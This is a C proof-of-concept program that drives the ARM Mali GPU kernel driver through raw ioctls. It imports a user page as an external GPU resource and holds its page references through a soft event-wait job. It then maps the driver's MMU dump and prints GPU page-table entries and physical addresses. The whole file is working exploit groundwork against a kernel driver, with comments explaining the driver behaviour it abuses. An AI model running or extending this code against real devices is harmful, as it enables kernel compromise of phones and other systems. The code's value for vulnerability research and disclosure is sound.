#define _GNU_SOURCE
#include <fcntl.h>
#include <err.h>
#include <stdint.h>
#include <stdio.h>
#include <assert.h>
#include <stdlib.h>
#include <unistd.h>
#include <ctype.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define KBASE_IOCTL_TYPE 0x80

#define __u8  uint8_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u64 uint64_t

struct kbase_ioctl_version_check {
        __u16 major;
        __u16 minor;
};
#define KBASE_IOCTL_VERSION_CHECK \
        _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)

struct kbase_ioctl_set_flags {
        __u32 create_flags;
};
#define KBASE_IOCTL_SET_FLAGS \
        _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)

union kbase_ioctl_mem_alloc {
	struct {
		__u64 va_pages;
		__u64 commit_pages;
		__u64 extension;
		__u64 flags;
	} in;
	struct {
		__u64 flags;
		__u64 gpu_va;
	} out;
};
#define KBASE_IOCTL_MEM_ALLOC \
	_IOWR(KBASE_IOCTL_TYPE, 5, union kbase_ioctl_mem_alloc)

struct kbase_ioctl_mem_free {
	__u64 gpu_addr;
};
#define KBASE_IOCTL_MEM_FREE \
	_IOW(KBASE_IOCTL_TYPE, 7, struct kbase_ioctl_mem_free)

struct base_mem_import_user_buffer {
    __u64 ptr;
      __u64 length;
};
union kbase_ioctl_mem_import {
    struct {
          __u64 flags;
              __u64 phandle;
                  __u32 type;
                      __u32 padding;
                        } in;
      struct {
            __u64 flags;
                __u64 gpu_va;
                    __u64 va_pages;
                      } out;
};
#define KBASE_IOCTL_MEM_IMPORT \
    _IOWR(KBASE_IOCTL_TYPE, 22, union kbase_ioctl_mem_import)

struct base_jd_udata {
	__u64 blob[2];
};
typedef __u8 base_atom_id;
typedef __u8 base_jd_dep_type;
struct base_dependency {
	base_atom_id atom_id;
	base_jd_dep_type dependency_type;
};
typedef __u8 base_jd_prio;
typedef __u32 base_jd_core_req;
  #define BASE_JD_REQ_SOFT_JOB        ((base_jd_core_req)1 << 9)
  #define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5)
  #define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6)
  #define BASE_JD_REQ_EXTERNAL_RESOURCES   ((base_jd_core_req)1 << 8)
struct base_external_resource {
        __u64 ext_resource;
};
struct base_jd_fragment {
	__u64 norm_read_norm_write;
	__u64 norm_read_forced_write;
	__u64 forced_read_forced_write;
	__u64 forced_read_norm_write;
};
typedef struct base_jd_atom {
	__u64 seq_nr;
	__u64 jc;
	struct base_jd_udata udata;
	__u64 extres_list;
	__u16 nr_extres;
	__u8 jit_id[2];
	struct base_dependency pre_dep[2];
	base_atom_id atom_number;
	base_jd_prio prio;
	__u8 device_nr;
	__u8 jobslot;
	base_jd_core_req core_req;
	__u8 renderpass_id;
	__u8 padding[7];
} base_jd_atom;
struct kbase_ioctl_job_submit {
	__u64 addr;
	__u32 nr_atoms;
	__u32 stride;
};
#define KBASE_IOCTL_JOB_SUBMIT \
	_IOW(KBASE_IOCTL_TYPE, 2, struct kbase_ioctl_job_submit)

#define LOCAL_PAGE_SHIFT 12
 #define BASE_MEM_MMU_DUMP_HANDLE (1ul << LOCAL_PAGE_SHIFT)
#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT)

int main(void) {
  // standard mali setup dance
  int mali_fd = SYSCHK(open("/dev/mali0", O_RDWR));
  struct kbase_ioctl_version_check vc = {
    .major = 11,
    .minor = 11
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_VERSION_CHECK, &vc));
  struct kbase_ioctl_set_flags set_flags = { .create_flags = 0 };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_SET_FLAGS, &set_flags));
  void *tracking_page = SYSCHK(mmap(NULL, 0x1000, PROT_NONE, MAP_SHARED,
        mali_fd, BASE_MEM_MAP_TRACKING_HANDLE));

  // make a single-page anonymous mapping, and fault in the page
  char *anon_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
        MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
  *(volatile char *)anon_mapping = 1;

  // if we have root rights: print phys addr from pagemap for comparison
  int pagemap_fd = SYSCHK(open("/proc/self/pagemap", O_RDONLY));
  uint64_t pagemap_entry = 0;
  SYSCHK(pread(pagemap_fd, &pagemap_entry, sizeof(pagemap_entry), 8 * ((unsigned long)anon_mapping / 0x1000)));
  printf("pagemap entry: 0x%016llx\n", (unsigned long long)pagemap_entry);
  close(pagemap_fd);

  // Create a KBASE_MEM_TYPE_IMPORTED_USER_BUF that refers to the anonymous
  // mapping's address range.
  struct base_mem_import_user_buffer ubuf = {
    .ptr = (unsigned long)anon_mapping,
    .length = 0x1000
  };
  union kbase_ioctl_mem_import mi = {
    .in = {
      .flags = 0xf/*CPU+GPU R+W*/,
      .phandle = (unsigned long)&ubuf,
      .type = 3/*BASE_MEM_IMPORT_TYPE_USER_BUFFER*/
    }
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_IMPORT, &mi));
  printf("MEM_IMPORT result: flags = 0x%lx, gpu_va=0x%lx, va_pages=0x%lx\n",
        (unsigned long)mi.out.flags, (unsigned long)mi.out.gpu_va,
        (unsigned long)mi.out.va_pages);
  // Here it gets weird: Mali tries to guarantee that GPU-virtual addresses
  // are also directly usable as host-virtual addresses without any explicit
  // mapping operations, so it will only allocate a GPU-virtual address range
  // when a host-virtual address range is assigned to this mapping by Mali's
  // mmap() handler. Even though this memory originally comes from a
  // userspace mapping!
  assert(mi.out.flags & (1<<14)/*BASE_MEM_NEED_MMAP*/);
  void *gpu_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
        MAP_SHARED, mali_fd, mi.out.gpu_va));
  printf("actual host+gpu VA: %p\n", gpu_mapping);
  // Note that if we tried to actually access the gpu_mapping at this point,
  // it would generate a SIGBUS, because Mali doesn't have a populated page
  // array at this point.

  // Allocate one page into which we can put a base_jd_fragment.
  union kbase_ioctl_mem_alloc ma = {
    .in = { .va_pages = 1, .commit_pages = 1, .flags = 0xf/*RW for CPU+GPU*/ }
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_MEM_ALLOC, &ma));
  printf("gpu_va = 0x%lx\n", (unsigned long)ma.out.gpu_va);
  unsigned long gpu_va;
  assert(ma.out.flags & (1<<13)/*BASE_MEM_SAME_VA*/);
  printf("  gpu_va is cookie, doing real mmap...\n");
  // again, dark magic: the GPU driver guarantees that the host-virtual
  // address returned by mmap() is the same as the GPU-virtual
  // address.
  struct base_jd_fragment *jc = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE,
        MAP_SHARED, mali_fd, ma.out.gpu_va));

  // Now we submit a job with an atom that requires the
  // KBASE_MEM_TYPE_IMPORTED_USER_BUF as an external resource. As part of
  // setting up this job, Mali will go through kbase_jd_user_buf_map(), which
  // grabs and stores page references.
  // When this job is done, it will drop the page references again; but since it
  // is a BASE_JD_REQ_SOFT_EVENT_WAIT request, it will wait until it times out
  // or the event has been set by userspace.
  struct base_external_resource extres = {
    .ext_resource = (unsigned long)gpu_mapping
  };
  struct base_jd_atom atom1 = {
    .atom_number = 0,
    .core_req = BASE_JD_REQ_EXTERNAL_RESOURCES | BASE_JD_REQ_SOFT_EVENT_WAIT,
    .nr_extres = 1,
    .extres_list = (unsigned long)&extres,
    .jc = (unsigned long)jc
  };
  struct kbase_ioctl_job_submit js1 = {
    .addr = (unsigned long)&atom1,
    .nr_atoms = 1,
    .stride = sizeof(atom1)
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_JOB_SUBMIT, &js1));

#define MMU_DUMP_SIZE 0x100000UL
  unsigned char *mali_mmu_dump = SYSCHK(mmap(NULL, MMU_DUMP_SIZE, PROT_READ, MAP_SHARED, mali_fd, BASE_MEM_MMU_DUMP_HANDLE));
  printf("got MMU dump\n");
  uint64_t *config = (void*)mali_mmu_dump;
  mali_mmu_dump += 3 * sizeof(uint64_t);
  while (*(uint64_t*)mali_mmu_dump != 0xff) {
    uint64_t pgd_phys_and_level = *(uint64_t*)mali_mmu_dump;
    unsigned int level = pgd_phys_and_level & 0xfULL;
    unsigned long long phys = pgd_phys_and_level & ~0xfULL;
    mali_mmu_dump += sizeof(uint64_t);
    printf("PGD level=%u phys=0x%llx\n", level, phys);
    for (unsigned int i=0; i<512; i++) {
      uint64_t entry = *(uint64_t*)mali_mmu_dump;
      mali_mmu_dump += sizeof(uint64_t);
      if ((entry & 3) == 2/*invalid*/)
        continue;
      printf("  [%03x] 0x%llx\n", i, (unsigned long long)entry);
    }
  }
  printf("dump end\n");
}
